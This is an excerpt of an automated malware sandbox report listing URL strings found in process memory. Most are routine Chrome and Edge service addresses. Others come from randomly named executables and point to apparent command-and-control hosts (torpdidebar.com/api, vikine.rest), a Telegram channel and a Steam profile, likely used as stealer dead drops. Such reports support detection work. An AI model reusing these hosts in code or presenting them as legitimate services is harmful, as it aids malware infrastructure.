Source: chrome.exe, 00000013.00000002.2689937106.00004A2C00394000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2694991608.00004A2C006A5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://mail.google.com/mail/installwebapp?usp=chrome_default
Source: msedge.exe, 00000020.00000002.2780257018.00004B08003A4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://msn.cn/
Source: msedge.exe, 00000020.00000002.2780257018.00004B08003A4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://msn.com/
Source: chrome.exe, 00000013.00000003.2651755090.00004A2C00C6C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.2616371451.00004A2C00C6C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2690411249.00004A2C0047C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.2600077601.00004A2C00C6C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2722268123.00004A2C00C70000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2692708952.00004A2C00618000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://myaccount.google.com/?utm_source=ga-chrome-actions&utm_medium=manageGA
Source: chrome.exe, 00000013.00000002.2727769412.00004A2C00F88000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2690411249.00004A2C0047C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2705348919.00004A2C0085C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2692835975.00004A2C00630000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://myaccount.google.com/data-and-privacy?utm_source=ga-chrome-actions&utm_medium=managePrivacy
Source: chrome.exe, 00000013.00000003.2623705533.00004A2C00E34000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2692835975.00004A2C00630000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://myaccount.google.com/find-your-phone?utm_source=ga-chrome-actions&utm_medium=findYourPhone
Source: chrome.exe, 00000013.00000003.2616739060.00004A2C014AC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://myaccount.google.com/shielded-email2B
Source: chrome.exe, 00000013.00000003.2620113408.00004A2C01634000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://myaccount.google.com/shielded-email?utm_source=chrome
Source: chrome.exe, 00000013.00000003.2616739060.00004A2C014AC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://myaccount.google.com/shielded-email?utm_source=chrome2B
Source: chrome.exe, 00000013.00000002.2688618359.00004A2C00098000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://myaccount.google.com/signinoptions/password?utm_source=ga-chrome-actions&utm_medium=changePW
Source: chrome.exe, 00000013.00000003.2594155047.00004A2C00F5C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2688779849.00004A2C000EC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://myactivity.google.com/
Source: chrome.exe, 00000013.00000002.2689218126.00004A2C001C4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://oauthaccountmanager.googleapis.com/
Source: chrome.exe, 00000013.00000002.2689316732.00004A2C0020C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://oauthaccountmanager.googleapis.com/v1/issuetoken
Source: msedge.exe, 00000020.00000002.2780257018.00004B08003A4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://office.net/
Source: chrome.exe, 00000013.00000003.2614989401.00004A2C013A8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ogads-pa.googleapis.com
Source: chrome.exe, 00000013.00000002.2726125590.00004A2C00D00000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ogs.google.com
Source: chrome.exe, 00000013.00000003.2614989401.00004A2C013A8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ogs.google.com/widget/app/so?eom=1
Source: chrome.exe, 00000013.00000003.2614989401.00004A2C013A8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ogs.google.com/widget/callout?eom=1
Source: chrome.exe, 00000013.00000002.2727021404.00004A2C00E58000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2727769412.00004A2C00F88000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2731578748.00004A2C012DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2707479075.00004A2C00A7C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2726312245.00004A2C00D5C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2731528816.00004A2C012D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2691750321.00004A2C0057C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2707658556.00004A2C00A98000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2732436944.00004A2C014A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2727184069.00004A2C00E94000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2689369730.00004A2C00268000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2726125590.00004A2C00D1D000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2706719206.00004A2C00924000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2726125590.00004A2C00D00000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1&target=OPTIMIZATION_TARGET_PAGE_TOPICS_
Source: chrome.exe, 00000013.00000002.2727335721.00004A2C00ED0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2689369730.00004A2C00268000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2726125590.00004A2C00D1D000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2726125590.00004A2C00D00000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1673999601&target=OPTIMIZATION_TARGET_PAG
Source: chrome.exe, 00000013.00000002.2727335721.00004A2C00ED0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2726125590.00004A2C00D1D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1678906374&target=OPTIMIZATION_TARGET_OMN
Source: chrome.exe, 00000013.00000002.2726312245.00004A2C00D5C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2726125590.00004A2C00D1D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1679317318&target=OPTIMIZATION_TARGET_LAN
Source: chrome.exe, 00000013.00000002.2706778030.00004A2C00978000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2726125590.00004A2C00D1D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1695049402&target=OPTIMIZATION_TARGET_GEO
Source: chrome.exe, 00000013.00000002.2726312245.00004A2C00D5C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2689553147.00004A2C002C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2727184069.00004A2C00E94000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2726125590.00004A2C00D1D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1695049414&target=OPTIMIZATION_TARGET_NOT
Source: chrome.exe, 00000013.00000002.2726312245.00004A2C00D5C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2726125590.00004A2C00D1D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1695051229&target=OPTIMIZATION_TARGET_PAG
Source: chrome.exe, 00000013.00000002.2727335721.00004A2C00ED0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2726125590.00004A2C00D1D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=210230727&target=OPTIMIZATION_TARGET_CLIE
Source: chrome.exe, 00000013.00000002.2690457553.00004A2C0049C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://optimizationguide-pa.googleapis.com/v1:GetHints
Source: msedge.exe, 00000020.00000003.2757372002.00004B0800274000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000020.00000003.2757496457.00004B0800284000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://permanently-removed.invalid/Logout
Source: msedge.exe, 00000020.00000003.2757372002.00004B0800274000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000020.00000003.2757496457.00004B0800284000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://permanently-removed.invalid/LogoutYxABzen
Source: msedge.exe, 00000020.00000003.2757372002.00004B0800274000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000020.00000003.2757496457.00004B0800284000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://permanently-removed.invalid/MergeSession
Source: msedge.exe, 00000020.00000003.2757372002.00004B0800274000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000020.00000003.2757496457.00004B0800284000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://permanently-removed.invalid/MergeSession0
Source: msedge.exe, 00000020.00000003.2757372002.00004B0800274000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000020.00000003.2757496457.00004B0800284000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://permanently-removed.invalid/chrome/blank.html
Source: msedge.exe, 00000020.00000003.2757372002.00004B0800274000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000020.00000003.2757496457.00004B0800284000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://permanently-removed.invalid/o/oauth2/revoke
Source: msedge.exe, 00000020.00000003.2757372002.00004B0800274000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000020.00000003.2757496457.00004B0800284000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://permanently-removed.invalid/oauth2/v1/userinfo
Source: msedge.exe, 00000020.00000003.2757372002.00004B0800274000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000020.00000003.2757496457.00004B0800284000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://permanently-removed.invalid/oauth2/v2/tokeninfo
Source: msedge.exe, 00000020.00000003.2757372002.00004B0800274000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000020.00000003.2757496457.00004B0800284000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://permanently-removed.invalid/oauth2/v4/token
Source: msedge.exe, 00000020.00000003.2757372002.00004B0800274000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000020.00000003.2757496457.00004B0800284000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://permanently-removed.invalid/reauth/v1beta/users/
Source: chrome.exe, 00000013.00000003.2594155047.00004A2C00F5C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2688779849.00004A2C000EC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://photos.google.com/settings?referrer=CHROME_NTP
Source: chrome.exe, 00000013.00000003.2600144793.00004A2C00930000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.2600578069.00004A2C0120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.2600295823.00004A2C01118000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://photos.google.com?referrer=CHROME_NTP
Source: chrome.exe, 00000013.00000002.2732613434.00004A2C01638000.00000004.00000800.00020000.00000000.sdmp, chromecache_139.21.dr	String found in binary or memory: https://play.google.com/log?format=json&hasfast=true
Source: chrome.exe, 00000013.00000002.2732613434.00004A2C01638000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://play.google.com/log?format=json&hasfast=trueageHandler
Source: chrome.exe, 00000013.00000002.2688779849.00004A2C000EC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://policies.google.com/
Source: chrome.exe, 00000013.00000003.2616739060.00004A2C014AC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://publickeyservice.gcp.privacysandboxservices.com
Source: chrome.exe, 00000013.00000003.2616739060.00004A2C014AC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://publickeyservice.pa.aws.privacysandboxservices.com
Source: chrome.exe, 00000013.00000003.2616739060.00004A2C014AC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://publickeyservice.pa.aws.privacysandboxservices.com/.well-known/protected-auction/v1/public-k
Source: chrome.exe, 00000013.00000003.2616739060.00004A2C014AC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://publickeyservice.pa.gcp.privacysandboxservices.com
Source: chrome.exe, 00000013.00000003.2616739060.00004A2C014AC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://publickeyservice.pa.gcp.privacysandboxservices.com/.well-known/protected-auction/v1/public-k
Source: chrome.exe, 00000013.00000002.2688558017.00004A2C00078000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://safebrowsing.google.com/safebrowsing/clientreport/chrome-sct-auditing
Source: chrome.exe, 00000013.00000002.2688710098.00004A2C000B4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://sctauditing-pa.googleapis.com/v1/knownscts/length/$1/prefix/$2?key=AIzaSyBOti4mM-6x9WDnZIjIe
Source: chrome.exe, 00000013.00000002.2689218126.00004A2C001C4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://securitydomain-pa.googleapis.com/v1/
Source: chrome.exe, 00000013.00000003.2616739060.00004A2C014AC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://shieldedids-pa.googleapis.com2
Source: chrome.exe, 00000013.00000003.2616739060.00004A2C014AC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://shieldedids-pa.googleapis.comJv
Source: chrome.exe, 00000013.00000003.2616739060.00004A2C014AC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://shieldedids-pa.googleapis.comb
Source: chrome.exe, 00000013.00000002.2695258337.00004A2C006D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2694440330.00004A2C00678000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2690457553.00004A2C0049C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2710437355.00004A2C00B64000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://sites.google.com/u/0/create?usp=chrome_actions
Source: chrome.exe, 00000013.00000002.2695258337.00004A2C006D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2694440330.00004A2C00678000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2690457553.00004A2C0049C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2710437355.00004A2C00B64000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://sites.google.com/u/0/create?usp=chrome_actionsactions
Source: chrome.exe, 00000013.00000003.2612479207.00004A2C00294000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ssl.gstatic.com
Source: chrome.exe, 00000013.00000002.2690087673.00004A2C0040C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.2613378973.00004A2C01370000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.2613481455.00004A2C01434000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ssl.gstatic.com/gb/images/bar/al-icon.png
Source: 1VB7gm8.exe, 00000008.00000003.2459365093.00000000047A0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199824159981
Source: 1VB7gm8.exe, 00000008.00000003.2459365093.00000000047A0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199824159981a110mgzMozilla/5.0
Source: 1VB7gm8.exe, 00000008.00000003.2473786820.0000000000BE6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t.me/sok33tn
Source: 1VB7gm8.exe, 00000008.00000003.2459365093.00000000047A0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://t.me/sok33tna110mgzMozilla/5.0
Source: chrome.exe, 00000013.00000002.2707329197.00004A2C00A18000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://t0.gstatic.com/faviconV2
Source: chrome.exe, 00000013.00000002.2689218126.00004A2C001C4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://tasks.googleapis.com/
Source: af53YGc.exe, 00000010.00000002.2731008539.0000000001327000.00000004.00000020.00020000.00000000.sdmp, af53YGc.exe, 0000001D.00000002.2819678760.0000000000F4A000.00000004.00000020.00020000.00000000.sdmp, L65uNi1.exe, 00000022.00000002.2884184396.0000000001677000.00000004.00000020.00020000.00000000.sdmp, L65uNi1.exe, 00000022.00000002.2884184396.000000000160A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://torpdidebar.com/
Source: L65uNi1.exe, 0000000B.00000002.2694965666.00000000011B5000.00000004.00000020.00020000.00000000.sdmp, af53YGc.exe, af53YGc.exe, 00000010.00000002.2729720783.00000000012AF000.00000004.00000020.00020000.00000000.sdmp, af53YGc.exe, 00000010.00000002.2731008539.0000000001327000.00000004.00000020.00020000.00000000.sdmp, af53YGc.exe, 0000001D.00000002.2818476473.0000000000EC9000.00000004.00000020.00020000.00000000.sdmp, af53YGc.exe, 0000001D.00000002.2819678760.0000000000F4A000.00000004.00000020.00020000.00000000.sdmp, L65uNi1.exe, 00000022.00000002.2884184396.00000000015E7000.00000004.00000020.00020000.00000000.sdmp, L65uNi1.exe, 00000022.00000002.2884184396.00000000015F2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://torpdidebar.com/api
Source: L65uNi1.exe, 0000000B.00000002.2694231478.000000000113E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://torpdidebar.com/api$
Source: af53YGc.exe, 0000001D.00000002.2819678760.0000000000F4A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://torpdidebar.com/apinP~J
Source: L65uNi1.exe, 0000000B.00000002.2694965666.00000000011B5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://torpdidebar.com/apiw
Source: af53YGc.exe, 0000001D.00000002.2819612613.0000000000F33000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://torpdidebar.com/no
Source: af53YGc.exe, 0000001D.00000002.2819678760.0000000000F4A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://torpdidebar.com/pia
Source: L65uNi1.exe, 0000000B.00000002.2694965666.00000000011B5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://torpdidebar.com/s
Source: af53YGc.exe, 0000001D.00000002.2818476473.0000000000EC9000.00000004.00000020.00020000.00000000.sdmp, L65uNi1.exe, 00000022.00000002.2884184396.000000000160A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://torpdidebar.com:443/api
Source: 1VB7gm8.exe, 00000008.00000003.2473786820.0000000000BE6000.00000004.00000020.00020000.00000000.sdmp, 1VB7gm8.exe, 00000008.00000003.2488553896.0000000000BE0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://vikine.rest
Source: 1VB7gm8.exe, 00000008.00000003.2502837222.0000000000BE3000.00000004.00000020.00020000.00000000.sdmp, 1VB7gm8.exe, 00000008.00000003.2516223536.0000000000BE3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://vikine.rest#
Source: 1VB7gm8.exe, 00000008.00000003.2516223536.0000000000BE3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://vikine.rest%
Source: 1VB7gm8.exe, 00000008.00000003.2990515067.0000000000C4D000.00000004.00000020.00020000.00000000.sdmp, 1VB7gm8.exe, 00000008.00000003.2761913826.0000000000C4D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://vikine.rest&
Source: 1VB7gm8.exe, 00000008.00000003.2516223536.0000000000BE3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://vikine.rest/
Source: 1VB7gm8.exe, 00000008.00000003.2516223536.0000000000BE3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://vikine.rest/-
Source: 1VB7gm8.exe, 00000008.00000003.2764498898.0000000000BE0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://vikine.rest/1
Source: 1VB7gm8.exe, 00000008.00000003.2502837222.0000000000BE3000.00000004.00000020.00020000.00000000.sdmp, 1VB7gm8.exe, 00000008.00000003.2516223536.0000000000BE3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://vikine.rest/3
Source: 1VB7gm8.exe, 00000008.00000003.2530230419.0000000000BE2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://vikine.rest/:&
Source: 1VB7gm8.exe, 00000008.00000003.2502837222.0000000000BE3000.00000004.00000020.00020000.00000000.sdmp, 1VB7gm8.exe, 00000008.00000003.2488553896.0000000000BE3000.00000004.00000020.00020000.00000000.sdmp, 1VB7gm8.exe, 00000008.00000003.2516223536.0000000000BE3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://vikine.rest/D&
Source: 1VB7gm8.exe, 00000008.00000003.2761913826.0000000000C4D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://vikine.rest/J
Source: 1VB7gm8.exe, 00000008.00000003.2530230419.0000000000BE2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://vikine.rest/_&
Source: 1VB7gm8.exe, 00000008.00000003.2761913826.0000000000C4D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://vikine.rest/b
Source: 1VB7gm8.exe, 00000008.00000003.2530230419.0000000000BE2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://vikine.rest/i&
Source: 1VB7gm8.exe, 00000008.00000003.2530230419.0000000000BE2000.00000004.00000020.00020000.00000000.sdmp, 1VB7gm8.exe, 00000008.00000003.2502837222.0000000000BE3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://vikine.rest/s
Source: 1VB7gm8.exe, 00000008.00000003.2502837222.0000000000BE3000.00000004.00000020.00020000.00000000.sdmp, 1VB7gm8.exe, 00000008.00000003.2488553896.0000000000BE3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://vikine.rest/st
Source: 1VB7gm8.exe, 00000008.00000003.2990515067.0000000000C4D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://vikine.rest/~
Source: 1VB7gm8.exe, 00000008.00000003.2990515067.0000000000C4D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://vikine.rest2
Source: 1VB7gm8.exe, 00000008.00000003.2990515067.0000000000C4D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://vikine.rest6
Source: 1VB7gm8.exe, 00000008.00000003.2764498898.0000000000BE0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://vikine.rest9
Source: 1VB7gm8.exe, 00000008.00000003.2991393831.0000000000BE0000.00000004.00000020.00020000.00000000.sdmp, 1VB7gm8.exe, 00000008.00000003.2530230419.0000000000BE2000.00000004.00000020.00020000.00000000.sdmp, 1VB7gm8.exe, 00000008.00000003.2502837222.0000000000BE3000.00000004.00000020.00020000.00000000.sdmp, 1VB7gm8.exe, 00000008.00000003.2764498898.0000000000BE0000.00000004.00000020.00020000.00000000.sdmp, 1VB7gm8.exe, 00000008.00000003.2516223536.0000000000BE3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://vikine.rest?
Source: 1VB7gm8.exe, 00000008.00000003.2530230419.0000000000BE2000.00000004.00000020.00020000.00000000.sdmp, 1VB7gm8.exe, 00000008.00000003.2502837222.0000000000BE3000.00000004.00000020.00020000.00000000.sdmp, 1VB7gm8.exe, 00000008.00000003.2488553896.0000000000BE3000.00000004.00000020.00020000.00000000.sdmp, 1VB7gm8.exe, 00000008.00000003.2516223536.0000000000BE3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://vikine.restI
Source: 1VB7gm8.exe, 00000008.00000003.2764498898.0000000000BE0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://vikine.restM
Source: 1VB7gm8.exe, 00000008.00000003.2764498898.0000000000BE0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://vikine.reste
Source: 1VB7gm8.exe, 00000008.00000003.2473786820.0000000000BE6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://web.telegram.org
Source: uniq.exe, 00000017.00000002.2777710828.00000000014BC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.cloudflare.com/5xx-error-landing
Source: chrome.exe, 00000013.00000002.2710437355.00004A2C00B64000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: chrome.exe, 00000013.00000002.2710437355.00004A2C00B64000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/search?q=
Source: chrome.exe, 00000013.00000002.2710437355.00004A2C00B64000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/search?q=&addon=opensearch
Source: chrome.exe, 00000013.00000002.2710437355.00004A2C00B64000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/search?q=&addon=opensearchn=opensearch
Source: chrome.exe, 00000013.00000003.2612479207.00004A2C00294000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2731369727.00004A2C012B8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google-analytics.com
Source: chrome.exe, 00000013.00000002.2728158838.00004A2C0109C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google-analytics.com;report-uri
Source: chrome.exe, 00000013.00000003.2612479207.00004A2C00294000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com
Source: chrome.exe, 00000013.00000003.2591445934.00004A2C00C70000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/
Source: chrome.exe, 00000013.00000002.2707196575.00004A2C009DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2690373508.00004A2C00464000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/Char
Source: chrome.exe, 00000013.00000002.2710437355.00004A2C00B64000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/async/ddljson?async=ntp:2
Source: chrome.exe, 00000013.00000002.2710437355.00004A2C00B64000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/async/ddljson?async=ntp:2ui.js
Source: chrome.exe, 00000013.00000002.2688531442.00004A2C0006C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/async/newtab_
Source: chrome.exe, 00000013.00000002.2688531442.00004A2C0006C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/async/newtab_b?
Source: chrome.exe, 00000013.00000002.2728158838.00004A2C0109C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/async/newtab_promos
Source: chrome.exe, 00000013.00000003.2616739060.00004A2C014AC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/chrome/go-mobile/?ios-campaign=desktop-chr-ntp&android-campaign=desktop-chr-n
Source: chrome.exe, 00000013.00000003.2616739060.00004A2C014AC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/chrome/hats/index.htmlb
Source: chrome.exe, 00000013.00000002.2727769412.00004A2C00F88000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2689218126.00004A2C001C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2695673143.00004A2C00754000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2706256596.00004A2C008A0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/chrome/tips/
Source: chrome.exe, 00000013.00000002.2727769412.00004A2C00F88000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2689218126.00004A2C001C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2695673143.00004A2C00754000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2706256596.00004A2C008A0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/chrome/tips/gs
Source: chrome.exe, 00000013.00000002.2725861369.00004A2C00CC0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/complete/
